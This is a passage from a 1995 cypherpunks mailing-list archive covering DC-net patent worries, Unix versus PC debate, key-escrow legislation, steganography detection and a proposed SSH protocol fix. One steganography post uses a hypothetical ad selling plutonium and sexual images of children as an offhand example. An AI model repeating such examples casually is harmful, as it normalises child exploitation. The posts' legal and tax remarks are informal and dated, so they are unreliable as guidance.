From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 08:06:42 PDT
To: cypherpunks@toad.com
Subject: Mods to Dining Cryptographers: legal questions...
Message-ID: <199507151502.AA25734@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm sorry if I was a little mysterious about my reference to
another use or mode of a DC-net; I'd _love_ to tell the rest of
you flat-out, and put the idea in the public domain, but I'm
not sure I _CAN_.

(All of this is only relevant, however, if no one else has thought of
it first; I think this is unlikely at the moment, as it would mandate
a large rewriting of the section on DC-nets in the cyphernomicon. On
the other hand, I'm kinda surprised that no one else has thought of
this.)

Anyway, I just have this awful feeling that if I post this, there's
going to be a stupid patent application filed by someone like Jim
Bidzos claiming this and I won't be able to do anything about it.
(Please note I mean the people _like_ Jim Bidzos and not Jim Bidzos
himself; he's merely an example of someone who has a lot of capital to
spend on software patents. I don't, and don't mean to say that _he_
goes around stealing ideas from other people and patenting them.)

How do I do this and protect myself from the people who do have the
money to go through the intellectual property courthouse game?

Should I just dump this in the public domain? 

Perhaps show it to a trusted individual (or two) on this list to look
at and see whether it is worth further development (perhaps not?)?

Are there any patents on Dining-Cryptographers networks that could
interfere with the placing in the public domain, or the patenting, of
an improvement to the network system?

I need help.

Phil

+----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+
| Phil Fraering / \"The English Hierarchy, if there be anything unsound in|
| pgf@tyrell.net\ /its constitution, has reason to tremble even at an air |
+----------------+-pump or an electrical machine."---Joseph Priestly------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 08:54:53 PDT
To: cypherpunks@toad.com
Subject: Deployment
In-Reply-To: <9507151505.AA23237@anon.penet.fi>
Message-ID: <199507151550.AA29983@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



   >In addition, now is the time to deploy stego, on a massive scale.  
   >How many stego programs have been released for Unix?

   Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus

The masses aren't responsible for the net either; the unix people
generally _are_. AFTER the tools are written for Unix, the stuff
can undoubtedly be ported down to the mainstream OS's. I hear
they're improving.

   with nifty Unix crypto utilities that PC users can only wonder about
   need to buy PC's and start porting now if you want to get anywhere.

   Unix?  Hah!  Gimme a break!  Unix is a Warsaw ghetto.

Unix is a Warsaw ghetto that can be run on almost any current PC,
including many that have problems with Windows '95. And it's more
capable.

You think the penet remailer you just used is running in Windows?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Sat, 15 Jul 95 08:10:33 PDT
To: cypherpunks@toad.com
Subject: Re: MISC> Current US National Security Directives published
In-Reply-To: <3tuelf$6e3@westie.mid.net>
Message-ID: <kVca9c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: voxbox!hypnos!ragnarok.oar.net!malgudi.oar.net!kira.cc.uakron.edu!neoucom.edu!news.ysu.edu!news.ecn.uoknor.edu!bubba.ucc.okstate.edu!news.ksu.ksu.edu!news.mid.net!news.mid.net!not-for-mail
From: Gleason Sackman <sackman@plains.nodak.edu>
Newsgroups: comp.internet.net-happenings
Subject: MISC> Current US National Security Directives published
Message-ID: <3tuelf$6e3@westie.mid.net>
Date: 11 Jul 1995 13:07:43 -0500
Sender: infoserv@news.mid.net
Organization: MIDnet, the Midwest's Gateway to the Global Internet.
Lines: 96
Approved: ralphie
NNTP-Posting-Host: westie.mid.net

*** From Net-Happenings Moderator ***

Date: Mon, 26 Jun 1995 18:15:21 -0500
From: SIMPSON@AUVM.AMERICAN.EDU
Subject: Current US National Security Directives published

CURRENT U.S. NATIONAL SECURITY DIRECTIVES PUBLISHED

This announcement is likely to be of particular interest to
librarians, historians, and journalists specializing in government
documents, international affairs, military affairs and military
history, nuclear policy, outer space, and US trade and technology
policy.....

Thank you for letting me share this with you.
			-- Christopher Simpson


I've compiled an unusually complete collection of presidential
National Security Decision Directives from the administrations of
Ronald Reagan and George Bush (1981-1993). The collection is similar
in certain respects to the well known _Foreign Relations of the
United States_ (FRUS) series, but is far more current. The
declassified texts of more than 250 NSDD's are included; each text
has an introduction describing its origin and context; and there is
an extensive cross-index and subject index. The collection goes
considerably beyond the NSDDs available at the US National Archives
or in any other collection, because it includes verbatim texts of
directives that have been leaked  in whole or in part by the
administration, but not formally declassified. It also includes
tables of organization of the National Security Council. The new
collection's format also makes it much less expensive, and easier to
use, catalog and store than any comparable microform or hard copy
collection.

Major areas of coverage include:

++ management of US national security policy, covert operations,
weapons procurement, arms control negotiations, and anti-terrorism
policies;

++ US relations with Israel, Europe, USSR, China, Australia,
Nicaragua, Mexico, Central America, East Africa, Japan, Germany,
Southeast Asia, Micronesia, Libya, Egypt, Iran, Iraq, the
Philippines, Yugoslavia, South Africa and Namibia, etc., etc.

++ nuclear weapons procurement and testing, nuclear arms control;
internal debates over SALT, ABM, START, SDI and related matters;
civil defense and FEMA;

++ Space policy, privatization of space assets, NASA-DOD conflicts,
space and aerospace procurement;

++ Trade policy with Japan, G-7 summits, technology transfer,
export controls, economic warfare, subsidies for strategic US
industries;

++ Telecommunications and computer policy, including technology
security policies;

++ drugs and US foreign policy;

++ the Iran-Contra affair and its aftermath;

++ internal security and emergency continuity of government policies;

++ war with Iraq;

and much more.


For further information:

_National Security Directives of the Reagan and Bush
Administrations; The Declassified History of US Political and
Military Policy 1981-1991,_ by Christopher Simpson. 1032 pages.

Westview Press, 1995  isbn: 0-8133-1177-2   list: $119.95

telephone: 303-444-3541     fax: 303-449-3356


"... absolutely indispensable for studying U.S. national security
policies during the Reagan and Bush administrations."
			Melvyn Leffler,
			President, Society for Historians of
			American Foreign Relations

"... painstaking and expert analysis... an important benchmark"
			Charles Tiefer,
			Deputy General Counsel and Solicitor,
			US House of Representatives


=====================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Sat, 15 Jul 95 14:37:59 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <2426@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <9507150128.AA16854@toad.com> "Brian A. LaMacchia" writes:
[...] 

I agree that as drafted any GAK'ed crypto satisfies the 
affirmative defense under Grassley's s. 1030(a).

> 
> The proposed 1030A(c) provides a defense to prosecution under 1030A(a).
> So if GAKed crypto satisfies 1030A(c) then it can be deployed without
> fear of prosecution under 1030A(a).  It might still violate ITAR, of
> course, although I suspect any system that satisfies 1030A(c) would be
> granted a CJ.

AFAIK, neither Clipper nor Capstone have actually gotten export 
clearance yet.  No demand?  Fact that there were at last count 
no more than two beta versions of the decrypt processor in 
existence?  Or is my info just out of date....

[...]
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@shadow.net (Joe Block)
Date: Sat, 15 Jul 95 10:07:41 PDT
To: jim@acm.org
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01520c00ac2d6ccb7194@[198.79.48.47]>
MIME-Version: 1.0
Content-Type: text/plain


>> silly@ugcs.caltech.edu ((me)) writes:
>> Help!   What does GAK stand for?  I've seen it a billion times,
>
>Government Access to Keys; also seen as GACK (Crypto Keys).  This is more
>descriptive and accurate than calling it Key Escrow, since escrow is for
>the benefit of the parties involved in a transaction.  I think it's Carl
>Ellison's invention, and most apt it is.

I like Federal Usurpation of Citizens Keys for Encrypted Discourse, myself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Sat, 15 Jul 95 10:30:43 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <9507151728.AA15916@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 14 Jul 95 21:28:27 -0400
>From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
>Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
>
>   >       `(c) It shall be an affirmative defense to prosecution under this
>   >     section that the software at issue used a universal decoding device
>   >     or program that was provided to the Department of Justice prior to
>   >     the distribution.'.
>
>   This isn't escrowed encryption being allowed here.  This is straight giving
>   of keys (or a back door) to the gov't.  Even Clipper fails this test.
>
>Why doesn't GAK satisfy this clause?

[...]  

>
>I don't see how Clipper fails the 1030A(c) test, except possibly for the
>fact that the proposed escrow agents were not both within DOJ.  I think
>that's a minor point.

Sorry.  That's the minor point I was talking about.

For example, one might make an exportable system by doing something really
nice for the gov't and giving NSA a back door master key for it to use.
That doesn't give it to the DoJ -- and I'm not so sure NSA would admit to
the existence of a back door much less release the master key.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Sat, 15 Jul 95 12:21:12 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Deployment
Message-ID: <Chameleon.4.01.2.950715141932.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


I had thought to respond similarly when I first saw this unixcentric 
statement:

>On Sat, 15 Jul 1995 an250888@anon.penet.fi wrote:
>
>> >In addition, now is the time to deploy stego, on a massive scale.  
>> >How many stego programs have been released for Unix?
>> 
>> Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
>> with nifty Unix crypto utilities that PC users can only wonder about
>> need to buy PC's and start porting now if you want to get anywhere.

I have to take issue with this, though:

>A legitimate point; however, the majority of PC users won't be in the 
>vanguard of /anything/ -- it's not the nature of the PC industry.  If all 
>the Unix folks do it, then the PC folks might.

The point *is* legitimate.  I disagree that PC users won't be in the vanguard 
of anything:  PC users *are* the market now (gag me with a TSR).  A nifty 
program for PC will be in use by millions in a *very* short time, while a 
similar program for unix will not even be visible to the larger market.  If 
PGP had been limited to the unix market, few people would know of it today.  
Frankly, the PC folks don't give a rat's ass what unix folks do.  Watch the 
production and sales numbers for Windows 95 and gasp.  For better or worse, 
that is the market, and that is where the bucks are to pay for connectivity, 
memory, disk, and... software.

>Besides, the first was the point I was making; the second, I was 
>personally interested, because, after all, I run unix.

I certainly don't want to bash unix, but I can't help but think that one's 
viewpoint of what's going on "out there" is strongly affected by the 
encapsulated universes we create for ourselves.  If you like to run unix but 
hooked into it from another PC running TCP/IP under Windows, you'd see what 
the vast majority of new users see -- no command line, no need to deal with a 
30 year old user interface (send flames to useless.arguments@blackhole.net). 

>In addition, many of the PC people who do Internet communications do it 
>through a unix server anyway.  So it would be beneficial.

Does that matter much?  ISPs are proliferating like mushrooms, and the users 
hooking up to them have PCs and Macs.  Users connect by PPP or SLIP and use 
mail and www clients.  The user interface therefore has nothing to do with 
the connectivity or host OS.  Most of them *never* telnet, and only some of 
them ftp to install web pages.  

Also, more and more people who connect to internet go *through* no ISP server 
at all.  A modem controller at the ISP prompts for userid and password, then 
connects them to an interface that takes them to a router.  Their packets 
flit over to the name server or out on the T1 as required, their traffic 
untouched by unix or any other OS.  An ISDN connection comes in on the same 
T1 that will carry most of its packets back out to the world, with a 
connection manager and router being the closest things to computers involved 
in the process.  At the far end of the net a server running who-cares-which-
OS handles the client's traffic and responds to it by standards that are 
thoroughly OS-independent.

I respectfully submit that improvements of user interface and tinker toy 
integration and development of new tools must be aimed at Windows / OS/2 / 
Mac System to have major impact, and at unix as a convenience to the 
important academic and other communities that work more directly with the 
unix user interfaces.  Academic and scientific users may make the bulk of 
thoughtful contribution in many areas, but that's like server push -- if 
there's no client, nothing happens.


--Bolivar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 15 Jul 95 11:03:56 PDT
To: an250888@anon.penet.fi
Subject: Re: Deployment
In-Reply-To: <9507151505.AA23237@anon.penet.fi>
Message-ID: <Pine.SUN.3.91.950715135653.2964B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jul 1995 an250888@anon.penet.fi wrote:

> >In addition, now is the time to deploy stego, on a massive scale.  
> >How many stego programs have been released for Unix?
> 
> Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
> with nifty Unix crypto utilities that PC users can only wonder about
> need to buy PC's and start porting now if you want to get anywhere.

A legitimate point; however, the majority of PC users won't be in the 
vanguard of /anything/ -- it's not the nature of the PC industry.  If all 
the Unix folks do it, then the PC folks might.

Besides, the first was the point I was making; the second, I was 
personally interested, because, after all, I run unix.

In addition, many of the PC people who do Internet communications do it 
through a unix server anyway.  So it would be beneficial.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Sun, 16 Jul 95 13:27:18 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Unix not the Only Place for "Vanguard" Applications
In-Reply-To: <199507152320.AA05094@tyrell.net>
Message-ID: <Pine.LNX.3.91.950715141132.1604B-100000@nesta.pr>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jul 1995, Phil Fraering wrote:

>    Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of
>    the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even
>    recollect who was who in this battle). Maybe it was the News vs. X vs.
>    OpenLook vs. NeXTStep vs. etc. user interface battles.
> 
> Well, it looks like there will be a major Unix mainstream again
> with two branches capable of more-or-less running each other's
> binaries without too much pain: FreeBSD and Linux.
>
My sentiments in a way, you'll see some higher end PC users moving to 
this, plus the usual gamut of teenage hackers, like I was.
 
>    In any case, I expect Windows (and Windows NT) will take an ever-increasing
>    share of the market for at least the next several years. I'm hardly alone
>    in this expectation.
> 
> BTW, I hear Linux can now run Windows 3.1 in its DOS box.
> 
not completely, it can load it and some apps if you run it like you used 
to have to on a 286.  WINE is far from complete.  The thing is some major 
software companies are actually taking initiative and making Linux native 
apps, like Wordperfect is coming out in Fall, and Matlab and Mathematica 
are either here already, or will be here in a month or so.  A lot of 
commercial databases are coming to Linux too.

BUT, please PLEASE, let's not let this turn into an advocacy war, I hang 
out on those groups myself and get enough of them there, don't need it 
here.  I think we're all intelligent enough to realize that both platform 
bases have advantages and disadvantages.  I personally get a woody from 
anything that flips bits so I'm not about to argue.


"I regret that I have but six orifices to give you" -Nesta Stubbs
/-/ a s t e  http://www.mcs.net/~nesta/home.html Angeli Caduti Assasin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Sat, 15 Jul 95 08:27:13 PDT
To: cypherpunks@toad.com
Subject: Deployment
Message-ID: <9507151505.AA23237@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>In addition, now is the time to deploy stego, on a massive scale.  
>How many stego programs have been released for Unix?

Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
with nifty Unix crypto utilities that PC users can only wonder about
need to buy PC's and start porting now if you want to get anywhere.

Unix?  Hah!  Gimme a break!  Unix is a Warsaw ghetto.


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Sat, 15 Jul 95 08:28:12 PDT
To: cypherpunks@toad.com
Subject: Off Your But and Learn! ;*)
Message-ID: <9507151505.AA23302@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>I am not a programmer either, but I am being motivated to become one. 
>If only there was more time.

Neither am I, but may I suggest the following:

S. Prata, C++ Primer Plus: Teach Yourself Object-Oriented Programming,
2d ed., Waite Group Press, ISBN 1-878739-74-3 (1995).  Nuts & bolts.

S. Lippman, C++ Primer, 2d ed., Addison-Wesley, ISBN 0-201-54848-8
(1993).  Not quite so nuts and bolts, but good to read after covering
the treatment of the same material in Prata.

I've just started working through these and find them effective.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sat, 15 Jul 95 16:04:03 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Unix not the Only Place for "Vanguard" Applications
Message-ID: <ac2d93b913021004f19f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:59 PM 7/15/95, Jon Lasser wrote:
>On Sat, 15 Jul 1995 an250888@anon.penet.fi wrote:
>
>> >In addition, now is the time to deploy stego, on a massive scale.
>> >How many stego programs have been released for Unix?
>>
>> Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
>> with nifty Unix crypto utilities that PC users can only wonder about
>> need to buy PC's and start porting now if you want to get anywhere.
>
>A legitimate point; however, the majority of PC users won't be in the
>vanguard of /anything/ -- it's not the nature of the PC industry.  If all
>the Unix folks do it, then the PC folks might.

I disagree with this, depending on what one's interpretation of "vanguard"
is, and for what products.

For example, I've been a Macintosh user since 1986, despite having worked
for Intel for 12 years prior to that. (Actually, I'm a fan of the Mac OS
and Way of Doing Things and don't care whether the main microprocessor is
Motorola, Intel, or Phlogistonics.)

For many years the most interesting--to me--applications came first on the
Macintosh, then on the PC, and then only occasionally to Unix machines.
Apps like PageMaker, Adobe Photoshop, Illustrator, Fractal Design Painter,
Eudora, MORE, and so forth. Things have changed recently, with Windows
getting the desirable apps a bit earlier than the Mac version. (The Mac
versions of the products above came first because of the obvious graphics
and user interface consistencies of the Mac, and the user community in
prepublication, journalism, and art environments. Writing for DOS in those
days was a real lose, because of the lack of a consistent set of standards
and toolbox calls...)

Only one program I use a lot came first on Unix boxes: FrameMaker. And
FrameMaker hit the Mac a few quarters after first appearing on Unix boxes,
around 1988 or so.

I'm not dismissing Unix boxes or Unix tools...they are obviously very
useful for running the Internet and the various tools that access it.
Enough said. (And SGI and Sun are doing pretty well. The "vanguard apps"
that run on these machines, including the well-known imaging apps, are not
things I use.)

But I think the point that PCs (and by extension, Macintoshes, which are a
flavor of PCs) are never in the vanguard is wrong. By my interpretation of
vanguard. (I expect a quibble, this being the Cypherpunks list, about
whether Jon meant "the majority of PC users won't be in the  vanguard of
/anything/ -- it's not the nature of the PC industry" to mean this...)

Frankly, Unix fragmented into a bunch of pieces. Maybe it was because of
the USL-Novell-AT&T-Sun-Unix International-etc. battles (I don't even
recollect who was who in this battle). Maybe it was the News vs. X vs.
OpenLook vs. NeXTStep vs. etc. user interface battles.

In any case, I expect Windows (and Windows NT) will take an ever-increasing
share of the market for at least the next several years. I'm hardly alone
in this expectation.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 15 Jul 95 07:18:36 PDT
To: cypherpunks@toad.com
Subject: Re: def'n of "computer network"
Message-ID: <v01510103ac2ca05c8eb2@[193.74.217.19]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>rick hoselton writes:
>> Perry, I don't understand.  If the least significant bits in my gif file
>> follow all the "known statistical distributions", how can anyone know
>> whether they are "just noise" or are an encrypted message,

If your attacker has a more sophisticated statistical model of noise
distributions than you do, then he can deduce the existence of a message.

>
>Indeed -- how could the recipient even know to look, unless these
>things arrived regularly and with a fully standardized form of
>steganography, in which case why bother, all you've done is come up
>with a very odd form of transfer encoding.
>
>If the recipient does know to look, that implies either that there is
>a hint, in which case the steganography is useless, or it implies that
>you have prearrangement, in which case my comments on prearrangement
>hold.

Well, there's things like the subliminal channel in DSS (discussed in Applied
Cryptography) whereby a DSS chip could leak bits of a user's private key.  In
the channel discussed, even if the user suspected the existence of the
channel, there's no way he can prove it.  Now, that's steganography!

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMAfXAI4k1+54BopBAQHF4AQA2jRHvyKQ0ojYj7GHWpmZ+hz84dsXDtUS
NJHqxjjIK1RtvPFAm4QI8p3lt/ovGKLH+CjpC0QuHZ0B3O3INkz/zD7IwsU+1SJA
QycBquLvh7Q/dPkZ6J6P87Bmy0gzNBJrvW7rxLuOQyu9EOUtixFS2H9lDNa8zISp
xZ/4yrb1/ZE=
=NKwt
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 15 Jul 95 07:18:41 PDT
To: cypherpunks@toad.com
Subject: Re: mistake on my part
Message-ID: <v01510100ac2d7f54957c@[193.74.217.19]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>
>Looking for a place that:
>
>(1.) is reasonably free
>
>(2.) permits Americans to work
>
>(3.) a person trained as an engineer can earn enough to feed and shelter
>     self and 4 dependents.
>

Tattoo this on your arm: N.A.T.O.  If you work overseas, you deduct 70
kilobucks  from your gross income on your 1040.  And NATO civilian
employees pay NO INCOME TAX TO ANY OTHER NATO COUNTRY.
Good bennies package, too.

Downside? A Glacial Slug-like Bureaucracy which doesn't seem to get a lot done.
3-Year contracts only.  Major competition from Euros who seem to know about the
perks.

Organization Motto:  "It's a cushy job, but somebody's got to do it."

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMAfXPo4k1+54BopBAQGxYwP/TkePpofICj/w554DfO2ugqKXo/Jzrz+0
YebTxGHi4cgjDSwnOco4a8GYjDtInbWdyCF9qwt1QzQli7hw4o5fjKKb6as8JOMX
WGcotpJwmsiNgBcUC/aUshmAdHjpK/tkZrwumeV8hx5acxmgqvE8pGNT3Fc0QYhn
QwtB/SWjS9k=
=ejaZ
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 15 Jul 95 07:19:00 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <v01510102ac2d82ae5f36@[193.74.217.19]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>Is there any precedent or possibility of either filing civil or criminal
>charges against a Government official for their _official_ actions?
>Something that will not only make for some Serious Press, but hit them from
>an unexpected angle?
>

It's extremely difficult to do that and not get laughed out of court.
Think about it.  If the president or congress could be sued for their official
actions, every unemployed auto worker would be suing them for not restricting
Japanese imports.  That's what sovereign immunity is for; to keep the
government from being nibbled to death by millions of little nuisance suits
from soreheads all over the country.

>Alternatively, could a civil suit be filed for invasion of privacy or
>somesuch? Or perhaps the previously mentioned violation of civil rights (a
>la Rodney King)?
>

Well actually, Congress is probably not subject to its own laws on privacy.
I remember during the Clarence Thomas confirmation hearings there was a bit of
a to-do about exactly who it was that leaked Anita Hill's allegations to the
press; and Joe Biden was going around saying "No crimes were committed, no
crimes were committed."  This was explained as Congress-speak for "The leak of
Hill's allegations was done by a Congressman, not a staffer" (It's illegal
for a staff member to disclose confidential material, but it's OK for his boss
to do it).

>How many laws, etc, can we invoke? I mean, most congresscritters don't craft
>laws on their own, so the involvement of their staff would constitute
>conspiracy, as well, wouldn't it?
>

First rule of computer self preservation: never try to hack a hacker.  Any
legal harassment you can do to them, they can do to you.  They're better at
it, and they've got a lot more money than you do.


-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMAfWao4k1+54BopBAQGjXgP/e6I7dvnOb45EGD4M06KIuKvZu1FqAQFV
Ljt5YFwPrIJuvoiVCZ+u/5d4EGsmCjh3kAUmFY/mJG/9dUj4nFMJFZjssjtuVi3X
hY4I/XFzx6tyTEE0RYOjgZPYx/ruZxegNSBnwMypDAGoYnw2SlExV22hLqVBT3A2
mZLKkHYpm0Q=
=ARI+
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 15 Jul 95 16:17:51 PDT
To: cypherpunks@toad.com
Subject: Re: Deployment
Message-ID: <Pine.3.89.9507152344.A1196-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



So, anyone want to volunteer to port Privtool to Windows ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 15 Jul 95 17:29:04 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: def'n of "computer network"
Message-ID: <199507160028.RAA08597@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



rick hoselton writes:
>> Perry, I don't understand.  If the least significant bits in my gif file
>> follow all the "known statistical distributions", how can anyone know 
>> whether they are "just noise" or are an encrypted message,

Perry E. Metzger wrote:
> Indeed -- how could the recipient even know to look,

Assume we have good public key steganography tools (I am not
aware of such tools.)

The recipient would have to scan a large pile of random 
pictures in the hope that some of the messages, when 
decoded using his private key, decoded into a correctly
formatted message.

Although prearrangement is needed, otherwise he would not 
be scanning this pile of random graphics for secret messages, 
he does not know whether he will receive a message or not, 
and no one else can know if he has received a message or not.

For example:

  "I have plutonium and bondage pictures of nine year old girls
   for sale"   My public key is 7uL623uvGjg8N-u7hO789HcysFhGyvcAgyh
   Interested parties should post replies stegoed into images
   posted on 
   alt.binaries.pictures.erotica.blondes.dinosaurs.oral.fetish.waifs

   Please use only new dirty pictures to hide your message in --
   not images I have already seen.
  "

Then people can post replies without anyone knowing they are
posting encrypted messages.
--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 15 Jul 95 17:29:11 PDT
To: cypherpunks@toad.com
Subject: Re: def'n of "computer network"
Message-ID: <199507160028.RAA08617@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:25 PM 7/15/95 +0100, Andrew Spring wrote:
> If your attacker has a more sophisticated statistical model of noise
> distributions than you do, then he can deduce the existence of a message.

Since each hardware scanning device, and each image source, has 
idiosyncratic forms of noise, it is much harder to detect 
unusual forms of noise, than it is to emulate a usual form
of noise.

The attacker will get a huge number of false positives.  He
will not know if there is a whole lot of stego going on, or
he needs to adjust his noise models for a whole lot of
cranky and/or funky scanners.


--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sat, 15 Jul 95 08:02:37 PDT
To: rsalz@osf.org
Subject: Ssh "security hole": proposed fix
In-Reply-To: <9507151255.AA12685@sulphur.osf.org>
Message-ID: <199507151502.SAA01269@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


I am thinking about the following solution to the issues pointed out
by David Mazieres.

These changes propose solutions to the following problems:
  - replay of password-authenticated sessions
  - corrupt server can use RSA authentication to log into another server

When the client receives SSH_SMSG_PUBLIC_KEY, it computes a 128 bit
(16 byte) value by converting the modulus of the public key into a
stream of bytes, msb first.  The cookie sent by the server is appended
to this stream.  Both sides compute the MD5 of the resulting stream.
This value will be called the "session id".

In the SSH_CMSG_SESSION_KEY message, the first 16 bytes of the session
key (before encryption) are xored with the 16 bytes of the session id.
This does not reveal plain text from the RSA-encrypted part, but binds
the encrypted session key to a specific cookie and server.  This
should eliminate the possibility of replay, because the cookie is
unique for each connection.

In all SSH_CMSG_AUTH_RSA_RESPONSE messages (used both in user and
client host authentication), append the session id to the decrypted
challenge before computing MD5.  The MD5 is computed from the
resulting 48 bytes.  This makes the response bound to the server
cookie and the server key, and should eliminate using the same response
for another server.  (Faking the server key is hard, because the
client verifies that it matches the one stored in its database.)

If a server supports this revision of the protocol, it reports its
protocol version as 1.1.  If the server protocol version is 1.0, the
